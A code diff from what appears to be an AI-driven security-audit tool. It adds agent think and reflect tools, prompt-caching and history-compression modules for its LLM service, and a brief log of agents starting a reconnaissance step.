from typing import Optional
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
from .base import AgentTool, ToolResult
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class ThinkInput(BaseModel):
    """Input parameters for the think tool."""

    # The reasoning text itself (required).
    thought: str = Field(..., description="思考内容,可以是分析、规划、评估等")
    # Optional label for the kind of reasoning; defaults to "general".
    category: Optional[str] = Field(default="general", description="思考类别: analysis(分析), planning(规划), evaluation(评估), decision(决策)")
|
||||
|
||||
|
||||
class ThinkTool(AgentTool):
    """
    Think tool.

    Gives the agent an explicit "thinking" action. The tool performs no
    operation beyond validating the thought, logging it at debug level and
    echoing it back in the result.
    """

    @property
    def name(self) -> str:
        return "think"

    @property
    def description(self) -> str:
        return """深度思考工具。用于:
1. 分析复杂的代码逻辑或安全问题
2. 规划下一步的分析策略
3. 评估发现的漏洞是否真实存在
4. 决定是否需要深入调查某个方向

使用此工具记录你的推理过程,这有助于保持分析的连贯性。

参数:
- thought: 你的思考内容
- category: 思考类别 (analysis/planning/evaluation/decision)"""

    @property
    def args_schema(self):
        return ThinkInput

    async def _execute(
        self,
        thought: str,
        category: str = "general",
        **kwargs
    ) -> ToolResult:
        """
        Record a thought.

        Args:
            thought: Reasoning text; blank input is rejected.
            category: Category key used to choose a display label; unknown
                keys get the generic label.
            **kwargs: Accepted and ignored.

        Returns:
            A failed ``ToolResult`` for blank input, otherwise a successful one
            carrying the label in ``data`` and the trimmed thought in
            ``metadata``.
        """
        if not (thought and thought.strip()):
            return ToolResult(
                success=False,
                error="思考内容不能为空",
            )

        thought = thought.strip()

        # Display label per category.
        category_labels = {
            "analysis": "🔍 分析",
            "planning": "📋 规划",
            "evaluation": "⚖️ 评估",
            "decision": "🎯 决策",
            "general": "💭 思考",
        }
        if category in category_labels:
            label = category_labels[category]
        else:
            label = "💭 思考"

        logger.debug(f"Think tool called: [{label}] {thought[:100]}...")

        char_count = len(thought)
        payload = {
            "message": f"思考已记录 ({char_count} 字符)",
            "category": category,
            "label": label,
        }
        details = {
            "thought": thought,
            "category": category,
            "char_count": char_count,
        }
        return ToolResult(success=True, data=payload, metadata=details)
|
||||
|
||||
|
||||
class ReflectTool(AgentTool):
    """
    Reflection tool.

    Lets the agent record a review of its analysis progress. The tool only
    packages its arguments into the result.
    """

    @property
    def name(self) -> str:
        return "reflect"

    @property
    def description(self) -> str:
        return """反思工具。用于回顾当前的分析进展:
1. 总结已经发现的问题
2. 评估当前分析的覆盖度
3. 识别可能遗漏的方向
4. 决定是否需要调整策略

参数:
- summary: 当前进展总结
- findings_so_far: 目前发现的问题数量
- coverage: 分析覆盖度评估 (low/medium/high)
- next_steps: 建议的下一步行动"""

    @property
    def args_schema(self):
        # NOTE(review): no input model is declared although the description
        # lists four parameters - confirm this is intended.
        return None

    async def _execute(
        self,
        summary: str = "",
        findings_so_far: int = 0,
        coverage: str = "medium",
        next_steps: str = "",
        **kwargs
    ) -> ToolResult:
        """
        Record a reflection.

        Args:
            summary: Summary of progress so far.
            findings_so_far: Number of issues found so far.
            coverage: Coverage assessment.
            next_steps: Suggested next actions.
            **kwargs: Accepted and ignored.

        Returns:
            A successful ``ToolResult`` whose ``data["reflection"]`` and
            ``metadata`` are the same reflection dict.
        """
        reflection = dict(
            summary=summary,
            findings_count=findings_so_far,
            coverage=coverage,
            next_steps=next_steps,
        )
        payload = {
            "message": "反思已记录",
            "reflection": reflection,
        }
        return ToolResult(success=True, data=payload, metadata=reflection)
|
||||
|
|
@ -0,0 +1,52 @@
|
|||
"""
|
||||
LLM 服务模块
|
||||
|
||||
提供统一的 LLM 调用接口,支持:
|
||||
- 多提供商支持(OpenAI, Claude, Gemini, DeepSeek 等)
|
||||
- Prompt Caching(减少 Token 消耗)
|
||||
- Memory Compression(对话历史压缩)
|
||||
- 流式输出
|
||||
- 智能重试
|
||||
"""
|
||||
|
||||
from .service import LLMService
|
||||
from .types import (
|
||||
LLMConfig,
|
||||
LLMProvider,
|
||||
LLMMessage,
|
||||
LLMRequest,
|
||||
LLMResponse,
|
||||
LLMUsage,
|
||||
LLMError,
|
||||
)
|
||||
from .prompt_cache import (
|
||||
PromptCacheManager,
|
||||
CacheConfig,
|
||||
CacheStrategy,
|
||||
CacheStats,
|
||||
prompt_cache_manager,
|
||||
estimate_tokens,
|
||||
)
|
||||
from .memory_compressor import MemoryCompressor
|
||||
|
||||
__all__ = [
|
||||
# Service
|
||||
"LLMService",
|
||||
# Types
|
||||
"LLMConfig",
|
||||
"LLMProvider",
|
||||
"LLMMessage",
|
||||
"LLMRequest",
|
||||
"LLMResponse",
|
||||
"LLMUsage",
|
||||
"LLMError",
|
||||
# Prompt Cache
|
||||
"PromptCacheManager",
|
||||
"CacheConfig",
|
||||
"CacheStrategy",
|
||||
"CacheStats",
|
||||
"prompt_cache_manager",
|
||||
"estimate_tokens",
|
||||
# Memory Compression
|
||||
"MemoryCompressor",
|
||||
]
|
||||
|
|
@ -1,9 +1,15 @@
|
|||
"""
|
||||
LiteLLM 统一适配器
|
||||
支持通过 LiteLLM 调用多个 LLM 提供商,使用统一的 OpenAI 兼容格式
|
||||
|
||||
增强功能:
|
||||
- Prompt Caching: 为支持的 LLM(如 Claude)添加缓存标记
|
||||
- 智能重试: 指数退避重试策略
|
||||
- 流式输出: 支持逐 token 返回
|
||||
"""
|
||||
|
||||
from typing import Dict, Any, Optional
|
||||
import logging
|
||||
from typing import Dict, Any, Optional, List
|
||||
from ..base_adapter import BaseLLMAdapter
|
||||
from ..types import (
|
||||
LLMConfig,
|
||||
|
|
@ -14,6 +20,9 @@ from ..types import (
|
|||
LLMError,
|
||||
DEFAULT_BASE_URLS,
|
||||
)
|
||||
from ..prompt_cache import prompt_cache_manager, estimate_tokens
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class LiteLLMAdapter(BaseLLMAdapter):
|
||||
|
|
@ -108,6 +117,25 @@ class LiteLLMAdapter(BaseLLMAdapter):
|
|||
# 构建消息
|
||||
messages = [{"role": msg.role, "content": msg.content} for msg in request.messages]
|
||||
|
||||
# 🔥 Prompt Caching: 为支持的 LLM 添加缓存标记
|
||||
cache_enabled = False
|
||||
if self.config.provider == LLMProvider.CLAUDE:
|
||||
# 估算系统提示词 token 数
|
||||
system_tokens = 0
|
||||
for msg in messages:
|
||||
if msg.get("role") == "system":
|
||||
system_tokens += estimate_tokens(msg.get("content", ""))
|
||||
|
||||
messages, cache_enabled = prompt_cache_manager.process_messages(
|
||||
messages=messages,
|
||||
model=self.config.model,
|
||||
provider=self.config.provider.value,
|
||||
system_prompt_tokens=system_tokens,
|
||||
)
|
||||
|
||||
if cache_enabled:
|
||||
logger.debug(f"🔥 Prompt Caching enabled for {self.config.model}")
|
||||
|
||||
# 构建请求参数
|
||||
kwargs: Dict[str, Any] = {
|
||||
"model": self._litellm_model,
|
||||
|
|
@ -170,6 +198,14 @@ class LiteLLMAdapter(BaseLLMAdapter):
|
|||
total_tokens=response.usage.total_tokens or 0,
|
||||
)
|
||||
|
||||
# 🔥 更新 Prompt Cache 统计
|
||||
if cache_enabled and hasattr(response.usage, "cache_creation_input_tokens"):
|
||||
prompt_cache_manager.update_stats(
|
||||
cache_creation_input_tokens=getattr(response.usage, "cache_creation_input_tokens", 0),
|
||||
cache_read_input_tokens=getattr(response.usage, "cache_read_input_tokens", 0),
|
||||
total_input_tokens=response.usage.prompt_tokens or 0,
|
||||
)
|
||||
|
||||
return LLMResponse(
|
||||
content=choice.message.content or "",
|
||||
model=response.model,
|
||||
|
|
|
|||
|
|
@ -0,0 +1,349 @@
|
|||
"""
|
||||
Memory Compressor - 对话历史压缩器
|
||||
|
||||
当对话历史变得很长时,自动进行压缩,保持语义完整性的同时降低Token消耗。
|
||||
|
||||
压缩策略:
|
||||
1. 保留所有系统消息
|
||||
2. 保留最近的N条消息
|
||||
3. 对较早的消息进行摘要压缩
|
||||
4. 保留关键信息(发现、决策点、错误)
|
||||
"""
|
||||
|
||||
import logging
|
||||
from typing import Any, Dict, List, Optional
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
# Tunable limits for conversation-history compression.

# Token budget for the whole conversation.
MAX_TOTAL_TOKENS = 100_000

# Number of newest non-system messages that are always kept verbatim.
MIN_RECENT_MESSAGES = 15

# Compression triggers once usage exceeds this fraction (90%) of the budget.
COMPRESSION_THRESHOLD = 0.9
|
||||
|
||||
|
||||
def estimate_tokens(text: str) -> int:
    """
    Roughly estimate how many tokens a piece of text occupies.

    Heuristic: about 4 ASCII characters per token and about 2 non-ASCII
    characters (e.g. Chinese) per token, plus one token of slack.

    Args:
        text: The text to measure.

    Returns:
        0 for empty/None input, otherwise the estimated token count (>= 1).
    """
    if not text:
        return 0

    # Count the wide (non-ASCII) characters; everything else is ASCII.
    wide = len([ch for ch in text if ord(ch) >= 128])
    narrow = len(text) - wide

    return narrow // 4 + wide // 2 + 1
|
||||
|
||||
|
||||
def get_message_tokens(msg: Dict[str, Any]) -> int:
    """
    Estimate the token count of a single chat message.

    Args:
        msg: Message dict; its "content" is either a plain string or a list
            of content blocks.

    Returns:
        The estimate for string content, the summed estimate of all
        ``{"type": "text"}`` blocks for list content, and 0 for anything else.
    """
    payload = msg.get("content", "")

    if isinstance(payload, str):
        return estimate_tokens(payload)

    if not isinstance(payload, list):
        return 0

    # Only text blocks contribute; other block types count as zero.
    return sum(
        estimate_tokens(block.get("text", ""))
        for block in payload
        if isinstance(block, dict) and block.get("type") == "text"
    )
|
||||
|
||||
|
||||
def extract_message_text(msg: Dict[str, Any]) -> str:
    """
    Flatten a chat message's content into plain text.

    Args:
        msg: Message dict; its "content" may be a string, a list of content
            blocks, ``None``, or any other value.

    Returns:
        - string content unchanged;
        - for a list: the text of every ``{"type": "text"}`` block and the
          placeholder ``[IMAGE]`` for every ``{"type": "image_url"}`` block,
          joined with single spaces (other items are ignored);
        - ``""`` when content is ``None``, so a missing body is not rendered
          as the literal word "None";
        - ``str(content)`` for any other type.
    """
    content = msg.get("content", "")

    # A null body carries no text; str(None) would inject the word "None".
    if content is None:
        return ""

    if isinstance(content, str):
        return content

    if isinstance(content, list):
        parts = []
        for item in content:
            if not isinstance(item, dict):
                continue
            block_type = item.get("type")
            if block_type == "text":
                # Guard against an explicit None, which would break join().
                parts.append(item.get("text") or "")
            elif block_type == "image_url":
                parts.append("[IMAGE]")
        return " ".join(parts)

    return str(content)
|
||||
|
||||
|
||||
class MemoryCompressor:
    """
    Conversation-history compressor.

    When the estimated size of a conversation exceeds the configured budget,
    older messages are replaced by short keyword-based summaries while system
    messages and the most recent messages are kept verbatim.
    """

    def __init__(
        self,
        max_total_tokens: int = MAX_TOTAL_TOKENS,
        min_recent_messages: int = MIN_RECENT_MESSAGES,
        llm_service=None,
    ):
        """
        Create a compressor.

        Args:
            max_total_tokens: Token budget for the whole conversation.
            min_recent_messages: Number of newest non-system messages that are
                always kept verbatim.
            llm_service: Optional LLM service intended for summary generation.
                It is only stored here; no method of this class calls it.
        """
        self.max_total_tokens = max_total_tokens
        self.min_recent_messages = min_recent_messages
        self.llm_service = llm_service

    def compress_history(
        self,
        messages: List[Dict[str, Any]],
    ) -> List[Dict[str, Any]]:
        """
        Compress a conversation history if it is over budget.

        Strategy:
            1. keep every system message;
            2. keep the newest ``min_recent_messages`` non-system messages;
            3. replace the older messages with chunk summaries.

        Args:
            messages: Original message list.

        Returns:
            The original list object when no compression is needed or
            possible; otherwise a new list ordered as
            ``system messages + summaries + recent messages``.
        """
        if not messages:
            return messages

        # Separate system messages (always kept) from regular ones.
        system_msgs = []
        regular_msgs = []
        for msg in messages:
            if msg.get("role") == "system":
                system_msgs.append(msg)
            else:
                regular_msgs.append(msg)

        total_tokens = sum(get_message_tokens(msg) for msg in messages)

        # Below the trigger threshold: nothing to do.
        if total_tokens <= self.max_total_tokens * COMPRESSION_THRESHOLD:
            return messages

        logger.info(f"Compressing conversation history: {total_tokens} tokens -> target: {int(self.max_total_tokens * 0.7)}")

        # Split on an explicit index. Negative slicing (`[-n:]` / `[:-n]`)
        # breaks for n == 0, where it keeps everything and compresses nothing.
        keep = max(self.min_recent_messages, 0)
        split_at = max(len(regular_msgs) - keep, 0)
        old_msgs = regular_msgs[:split_at]
        recent_msgs = regular_msgs[split_at:]

        if not old_msgs:
            return messages

        compressed = self._compress_messages(old_msgs)
        result = system_msgs + compressed + recent_msgs

        new_total = sum(get_message_tokens(msg) for msg in result)
        # total_tokens can only be 0 here with a negative budget; avoid a
        # ZeroDivisionError in the log line for that case.
        reduction = 100 - new_total * 100 // total_tokens if total_tokens > 0 else 0
        logger.info(f"Compression complete: {total_tokens} -> {new_total} tokens ({reduction}% reduction)")

        return result

    def _compress_messages(
        self,
        messages: List[Dict[str, Any]],
        chunk_size: int = 10,
    ) -> List[Dict[str, Any]]:
        """
        Summarise messages chunk by chunk.

        Args:
            messages: Messages to compress.
            chunk_size: Number of messages folded into each summary.

        Returns:
            One summary message per chunk.

        Raises:
            ValueError: If ``chunk_size`` is smaller than 1. A negative step
                would otherwise yield no chunks and silently drop every
                message.
        """
        if chunk_size < 1:
            raise ValueError("chunk_size must be a positive integer")

        if not messages:
            return []

        compressed = []
        for start in range(0, len(messages), chunk_size):
            summary = self._summarize_chunk(messages[start:start + chunk_size])
            if summary:
                compressed.append(summary)

        return compressed

    def _summarize_chunk(self, messages: List[Dict[str, Any]]) -> Optional[Dict[str, Any]]:
        """
        Build one summary message for a group of messages.

        Args:
            messages: Messages to summarise.

        Returns:
            ``None`` for an empty group, otherwise an assistant message whose
            content is a ``<context_summary>`` element listing findings,
            tools, decisions and errors (or a generic placeholder when none
            were extracted). The extracted file list is not rendered.
        """
        if not messages:
            return None

        key_info = self._extract_key_info(messages)

        summary_parts = []

        if key_info["findings"]:
            summary_parts.append(f"发现: {', '.join(key_info['findings'][:5])}")

        if key_info["tools_used"]:
            summary_parts.append(f"使用工具: {', '.join(key_info['tools_used'][:5])}")

        if key_info["decisions"]:
            summary_parts.append(f"决策: {', '.join(key_info['decisions'][:3])}")

        if key_info["errors"]:
            summary_parts.append(f"错误: {', '.join(key_info['errors'][:2])}")

        if not summary_parts:
            # Nothing recognisable was extracted: emit a generic placeholder.
            summary_parts.append(f"[已压缩 {len(messages)} 条历史消息]")

        summary_text = " | ".join(summary_parts)

        return {
            "role": "assistant",
            "content": f"<context_summary message_count='{len(messages)}'>{summary_text}</context_summary>",
        }

    def _extract_key_info(self, messages: List[Dict[str, Any]]) -> Dict[str, List[str]]:
        """
        Extract key facts from messages using keyword and regex heuristics.

        Matching is done on lower-cased text, so extracted tool names,
        decisions and errors are lower-case.

        Args:
            messages: Messages to scan.

        Returns:
            Dict with the keys ``findings``, ``tools_used``, ``decisions``,
            ``errors`` and ``files_analyzed``; each value holds at most five
            distinct entries in first-seen order.
        """
        import re

        # Keyword -> label table for vulnerability classes (loop-invariant).
        vuln_patterns = {
            "sql": "SQL注入",
            "xss": "XSS",
            "ssrf": "SSRF",
            "idor": "IDOR",
            "auth": "认证问题",
            "injection": "注入漏洞",
            "traversal": "路径遍历",
            "deserialization": "反序列化",
            "hardcoded": "硬编码凭证",
            "secret": "密钥泄露",
        }
        finding_markers = ("发现", "漏洞", "finding", "vulnerability")

        # File-path patterns. The separator class accepts the ASCII colon and
        # the full-width colon commonly written after the Chinese prefixes.
        file_patterns = (
            r'读取文件[::]\s*([^\s\n]+)',
            r'分析文件[::]\s*([^\s\n]+)',
            r'file[_\s]?path[::]\s*["\']?([^\s\n"\']+)',
        )

        key_info: Dict[str, List[str]] = {
            "findings": [],
            "tools_used": [],
            "decisions": [],
            "errors": [],
            "files_analyzed": [],
        }

        for msg in messages:
            text = extract_message_text(msg).lower()

            # Vulnerability classes: keyword plus a "finding" marker anywhere
            # in the same message.
            if any(marker in text for marker in finding_markers):
                for pattern, label in vuln_patterns.items():
                    if pattern in text and label not in key_info["findings"]:
                        key_info["findings"].append(label)

            # Tool usage: first "action: <name>" occurrence in the message.
            tool_match = re.search(r'action:\s*(\w+)', text, re.IGNORECASE)
            if tool_match:
                tool = tool_match.group(1)
                if tool not in key_info["tools_used"]:
                    key_info["tools_used"].append(tool)

            # Files that were read or analysed.
            for pattern in file_patterns:
                for match in re.findall(pattern, text):
                    if match not in key_info["files_analyzed"]:
                        key_info["files_analyzed"].append(match)

            # Decisions: capture a short snippet, else a generic marker.
            if any(kw in text for kw in ["决定", "决策", "decision", "选择", "采用"]):
                decision_match = re.search(r'(决定|决策|decision)[::\s]*([^\n。.]{10,50})', text)
                if decision_match:
                    key_info["decisions"].append(decision_match.group(2)[:50])
                else:
                    key_info["decisions"].append("做出决策")

            # Errors: capture a short snippet, else a generic marker.
            if any(kw in text for kw in ["错误", "失败", "error", "failed", "exception"]):
                error_match = re.search(r'(错误|error|failed)[::\s]*([^\n]{10,50})', text, re.IGNORECASE)
                if error_match:
                    key_info["errors"].append(error_match.group(2)[:50])
                else:
                    key_info["errors"].append("遇到错误")

        # De-duplicate while preserving first-seen order, then cap. A set
        # would make both the order and the surviving items nondeterministic.
        for key in key_info:
            key_info[key] = list(dict.fromkeys(key_info[key]))[:5]

        return key_info

    def should_compress(self, messages: List[Dict[str, Any]]) -> bool:
        """
        Tell whether the history is large enough to need compression.

        Args:
            messages: Message list.

        Returns:
            True when the estimated total exceeds
            ``max_total_tokens * COMPRESSION_THRESHOLD``.
        """
        total_tokens = sum(get_message_tokens(msg) for msg in messages)
        return total_tokens > self.max_total_tokens * COMPRESSION_THRESHOLD
|
||||
|
||||
|
||||
# 便捷函数
|
||||
def compress_conversation(
    messages: List[Dict[str, Any]],
    max_tokens: int = MAX_TOTAL_TOKENS,
) -> List[Dict[str, Any]]:
    """
    Convenience wrapper: compress a history with a throwaway compressor.

    Args:
        messages: Message list.
        max_tokens: Token budget handed to the compressor.

    Returns:
        Whatever ``MemoryCompressor.compress_history`` returns for
        ``messages`` under that budget.
    """
    return MemoryCompressor(max_total_tokens=max_tokens).compress_history(messages)
|
||||
|
|
@ -0,0 +1,333 @@
|
|||
"""
|
||||
Prompt Caching 模块
|
||||
|
||||
为支持缓存的 LLM(如 Anthropic Claude)提供 Prompt 缓存功能。
|
||||
通过在系统提示词和早期对话中添加缓存标记,减少重复处理,
|
||||
显著降低 Token 消耗和响应延迟。
|
||||
|
||||
支持的 LLM:
|
||||
- Anthropic Claude (claude-3-5-sonnet, claude-3-opus, claude-3-haiku)
|
||||
- OpenAI (暂不支持:CACHEABLE_MODELS 中的 OpenAI 模型均标记为 False)
|
||||
|
||||
缓存策略:
|
||||
- 短对话(<10轮): 仅缓存系统提示词
|
||||
- 中等对话(10-30轮): 缓存系统提示词 + 前5轮对话
|
||||
- 长对话(>30轮): 多个缓存点,动态调整
|
||||
"""
|
||||
|
||||
import logging
|
||||
from typing import Dict, Any, List, Optional, Tuple
|
||||
from dataclasses import dataclass, field
|
||||
from enum import Enum
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class CacheStrategy(str, Enum):
    """Where cache markers are placed in an outgoing prompt."""

    # No caching at all.
    NONE = "none"
    # Cache the system prompt only.
    SYSTEM_ONLY = "system_only"
    # Cache the system prompt plus the early part of the conversation.
    SYSTEM_AND_EARLY = "system_early"
    # Several cache points spread over the conversation.
    MULTI_POINT = "multi_point"
|
||||
|
||||
|
||||
@dataclass
class CacheConfig:
    """Settings that control prompt caching."""

    # Master switch.
    enabled: bool = True
    # Configured strategy value (default: system prompt plus early messages).
    strategy: CacheStrategy = CacheStrategy.SYSTEM_AND_EARLY

    # --- thresholds ---
    # The system prompt must have at least this many tokens to be cached.
    min_system_prompt_tokens: int = 1000
    # How many early messages are covered by the "early" cache.
    early_messages_count: int = 5

    # --- multi-point settings ---
    # Distance, in messages, between successive cache points.
    multi_point_interval: int = 10
    # Upper bound on the number of cache points.
    max_cache_points: int = 4
|
||||
|
||||
|
||||
@dataclass
class CacheStats:
    """Running counters describing prompt-cache effectiveness."""

    cache_hits: int = 0
    cache_misses: int = 0
    cached_tokens: int = 0
    total_tokens: int = 0

    @property
    def hit_rate(self) -> float:
        """Fraction of recorded requests that were cache hits (0.0 if none)."""
        requests = self.cache_hits + self.cache_misses
        if requests > 0:
            return self.cache_hits / requests
        return 0.0

    @property
    def token_savings(self) -> float:
        """Fraction of all input tokens served from cache (0.0 if none)."""
        if self.total_tokens > 0:
            return self.cached_tokens / self.total_tokens
        return 0.0
|
||||
|
||||
|
||||
class PromptCacheManager:
    """
    Prompt cache manager.

    Responsibilities:
        1. decide whether a model/provider pair supports prompt caching;
        2. choose a caching strategy from the conversation length;
        3. attach cache markers to messages;
        4. keep hit/miss statistics.
    """

    # Known models and whether caching is enabled for them.
    CACHEABLE_MODELS = {
        # Anthropic Claude
        "claude-3-5-sonnet": True,
        "claude-3-5-sonnet-20241022": True,
        "claude-3-opus": True,
        "claude-3-opus-20240229": True,
        "claude-3-haiku": True,
        "claude-3-haiku-20240307": True,
        "claude-3-sonnet": True,
        "claude-3-sonnet-20240229": True,
        # OpenAI (not supported yet)
        "gpt-4-turbo": False,
        "gpt-4o": False,
        "gpt-4o-mini": False,
    }

    # Anthropic cache marker (copied per block, never shared by reference).
    ANTHROPIC_CACHE_CONTROL = {"type": "ephemeral"}

    # Anthropic accepts at most this many cache_control blocks per request.
    ANTHROPIC_MAX_CACHE_BREAKPOINTS = 4

    def __init__(self, config: Optional["CacheConfig"] = None):
        """
        Args:
            config: Cache settings; a default ``CacheConfig`` is used when
                omitted.
        """
        self.config = config or CacheConfig()
        self.stats = CacheStats()
        self._cache_enabled_for_session = True

    def supports_caching(self, model: str, provider: str) -> bool:
        """
        Check whether a model supports prompt caching.

        Args:
            model: Model name (matched case-insensitively by substring).
            provider: Provider name; only "anthropic"/"claude" can qualify.

        Returns:
            True if caching is enabled in the config and the first
            ``CACHEABLE_MODELS`` key contained in ``model`` is flagged True.
        """
        if not self.config.enabled:
            return False

        if provider.lower() in ["anthropic", "claude"]:
            model_name = model.lower()
            for cacheable_model, supported in self.CACHEABLE_MODELS.items():
                if cacheable_model in model_name:
                    return supported

        return False

    def determine_strategy(
        self,
        messages: List[Dict[str, Any]],
        system_prompt_tokens: int = 0,
    ) -> CacheStrategy:
        """
        Pick a caching strategy from the conversation state.

        Args:
            messages: Message list (its length drives the choice).
            system_prompt_tokens: Estimated token count of the system prompt.

        Returns:
            ``NONE`` if caching is disabled or the system prompt is shorter
            than ``min_system_prompt_tokens``; ``SYSTEM_ONLY`` below 10
            messages; ``SYSTEM_AND_EARLY`` below 30; ``MULTI_POINT`` otherwise.
        """
        if not self.config.enabled:
            return CacheStrategy.NONE

        # A short system prompt is not worth caching.
        if system_prompt_tokens < self.config.min_system_prompt_tokens:
            return CacheStrategy.NONE

        message_count = len(messages)

        if message_count < 10:
            return CacheStrategy.SYSTEM_ONLY

        if message_count < 30:
            return CacheStrategy.SYSTEM_AND_EARLY

        return CacheStrategy.MULTI_POINT

    def add_cache_markers_anthropic(
        self,
        messages: List[Dict[str, Any]],
        strategy: CacheStrategy,
    ) -> List[Dict[str, Any]]:
        """
        Attach Anthropic ``cache_control`` markers to messages.

        A marker caches the whole prompt prefix up to and including the
        marked block, so one marker at the end of a region covers that region.
        The number of markers never exceeds the smaller of
        ``config.max_cache_points`` and the provider limit of four.

        Args:
            messages: Original message list (not modified).
            strategy: Caching strategy.

        Returns:
            ``messages`` itself for ``NONE``; otherwise a new list of
            shallow-copied messages in which the selected ones carry a marker.
        """
        if strategy == CacheStrategy.NONE:
            return messages

        marked = set(self._select_cache_breakpoints(messages, strategy))

        cached_messages = []
        for i, msg in enumerate(messages):
            new_msg = msg.copy()
            if i in marked:
                new_msg = self._add_cache_to_message(new_msg)
            cached_messages.append(new_msg)

        return cached_messages

    @staticmethod
    def _can_carry_marker(msg: Dict[str, Any]) -> bool:
        """Return True if the message content can hold a cache marker."""
        content = msg.get("content", "")
        if isinstance(content, str):
            # Empty text blocks must not carry cache_control.
            return bool(content)
        return isinstance(content, list) and bool(content) and isinstance(content[-1], dict)

    def _select_cache_breakpoints(
        self,
        messages: List[Dict[str, Any]],
        strategy: CacheStrategy,
    ) -> List[int]:
        """Choose the message indices that receive a cache marker, within budget."""
        budget = min(self.config.max_cache_points, self.ANTHROPIC_MAX_CACHE_BREAKPOINTS)
        if budget <= 0:
            return []

        system_indices = []
        conversation_indices = []
        for i, msg in enumerate(messages):
            if not self._can_carry_marker(msg):
                continue
            if msg.get("role") == "system":
                system_indices.append(i)
            else:
                conversation_indices.append(i)

        candidates = []

        # Early conversation: a single marker on the last early message.
        if strategy in (CacheStrategy.SYSTEM_AND_EARLY, CacheStrategy.MULTI_POINT):
            early = [i for i in conversation_indices if i <= self.config.early_messages_count]
            if early:
                candidates.append(early[-1])

        # Additional markers at every `multi_point_interval` messages.
        interval = self.config.multi_point_interval
        if strategy == CacheStrategy.MULTI_POINT and interval > 0:
            for i in conversation_indices:
                if i > 0 and i % interval == 0 and i not in candidates:
                    candidates.append(i)

        selected = []
        # The system prompt always comes first; marking the last system
        # message is enough to cover the ones before it.
        if system_indices:
            selected.append(system_indices[-1])

        # Spend the remaining budget on the latest candidates, which cover
        # the longest prefix.
        remaining = budget - len(selected)
        if remaining > 0:
            selected.extend(sorted(candidates)[-remaining:])

        return sorted(selected)

    def _add_cache_to_message(self, msg: Dict[str, Any]) -> Dict[str, Any]:
        """
        Attach a cache marker to a single message.

        String content is wrapped in a text content block; for block-list
        content the last block receives the marker. The message's "content"
        entry is replaced with a new list, so content blocks shared with the
        caller's original message are never mutated.

        Args:
            msg: Message to mark (its "content" key may be reassigned).

        Returns:
            The same ``msg`` dict; unchanged when the content is empty or has
            no dict block to mark.
        """
        content = msg.get("content", "")

        if isinstance(content, str):
            if content:
                msg["content"] = [
                    {
                        "type": "text",
                        "text": content,
                        "cache_control": dict(self.ANTHROPIC_CACHE_CONTROL),
                    }
                ]
        elif isinstance(content, list):
            if content and isinstance(content[-1], dict):
                # Copy the list and the last block instead of editing in place.
                last_block = dict(content[-1])
                last_block["cache_control"] = dict(self.ANTHROPIC_CACHE_CONTROL)
                msg["content"] = content[:-1] + [last_block]

        return msg

    def process_messages(
        self,
        messages: List[Dict[str, Any]],
        model: str,
        provider: str,
        system_prompt_tokens: int = 0,
    ) -> Tuple[List[Dict[str, Any]], bool]:
        """
        Add cache markers to messages when the model supports it.

        Args:
            messages: Original message list.
            model: Model name.
            provider: Provider name.
            system_prompt_tokens: Estimated system-prompt token count.

        Returns:
            ``(messages to send, whether caching was applied)``.
        """
        if not self.supports_caching(model, provider):
            return messages, False

        strategy = self.determine_strategy(messages, system_prompt_tokens)

        if strategy == CacheStrategy.NONE:
            return messages, False

        # Choose the marking method by provider.
        if provider.lower() in ["anthropic", "claude"]:
            cached_messages = self.add_cache_markers_anthropic(messages, strategy)
            logger.debug(f"Applied {strategy.value} caching strategy for Anthropic")
            return cached_messages, True

        return messages, False

    def update_stats(
        self,
        cache_creation_input_tokens: int = 0,
        cache_read_input_tokens: int = 0,
        total_input_tokens: int = 0,
    ):
        """
        Record the cache usage reported for one response.

        Args:
            cache_creation_input_tokens: Tokens written to the cache
                (accepted for API symmetry; not tracked).
            cache_read_input_tokens: Tokens served from the cache; a positive
                value counts as a hit, anything else as a miss.
            total_input_tokens: Total input tokens of the request.
        """
        # Usage fields may be reported as None; treat that as zero.
        cache_read_input_tokens = cache_read_input_tokens or 0
        total_input_tokens = total_input_tokens or 0

        if cache_read_input_tokens > 0:
            self.stats.cache_hits += 1
            self.stats.cached_tokens += cache_read_input_tokens
        else:
            self.stats.cache_misses += 1

        self.stats.total_tokens += total_input_tokens

    def get_stats_summary(self) -> Dict[str, Any]:
        """Return the counters plus hit rate and token savings as percent strings."""
        return {
            "cache_hits": self.stats.cache_hits,
            "cache_misses": self.stats.cache_misses,
            "hit_rate": f"{self.stats.hit_rate:.2%}",
            "cached_tokens": self.stats.cached_tokens,
            "total_tokens": self.stats.total_tokens,
            "token_savings": f"{self.stats.token_savings:.2%}",
        }
|
||||
|
||||
|
||||
# Module-level cache manager instance, created once at import time.
prompt_cache_manager: PromptCacheManager = PromptCacheManager()
|
||||
|
||||
|
||||
def estimate_tokens(text: str) -> int:
    """
    Roughly estimate the number of tokens in a text.

    Heuristic: about 2 characters per token for characters in the
    U+4E00..U+9FFF range (Chinese) and about 4 characters per token for
    everything else. The result is truncated toward zero.

    Args:
        text: Text content.

    Returns:
        Estimated token count; 0 for empty/None input.
    """
    if not text:
        return 0

    # Tally characters inside the Chinese range.
    cjk = 0
    for ch in text:
        if '\u4e00' <= ch <= '\u9fff':
            cjk += 1
    rest = len(text) - cjk

    weighted = cjk / 2 + rest / 4
    return int(weighted)
|
||||
Binary file not shown.
|
|
@ -0,0 +1,809 @@
|
|||
14:22:48
|
||||
🔗 Connected to audit stream
|
||||
14:23:04
|
||||
Orchestrator
|
||||
Thought: 我需要对这个复杂的多组件项目进行安全审计。项目包含多个引擎(MediaEngine, MindSpider, QueryEngine, ReportEngine, InsightEngine, ForumEngine)和相关的 Streamlit 报告应用,使用 Python 和 JavaScript 开发。首先,我需要全面了解项目的结构、技术栈和入口点,以便确定审计的重点区域。我将从 recon Agent 开始,收集项目的基本信息。
|
||||
14:23:08
|
||||
📤 调度 recon Agent: 分析项目结构、技术栈、入口点和主要组件...
|
||||
Orchestrator
|
||||
14:23:18
|
||||
Recon
|
||||
Thought: 我需要开始收集项目信息。首先,我应该了解项目的整体结构,包括目录布局和文件组织。这将帮助我识别项目的基本架构和组件。我将从根目录开始,使用list_files工具查看项目结构。
|
||||
14:23:22
|
||||
Completed: list_files
|
||||
Recon
|
||||
4ms
|
||||
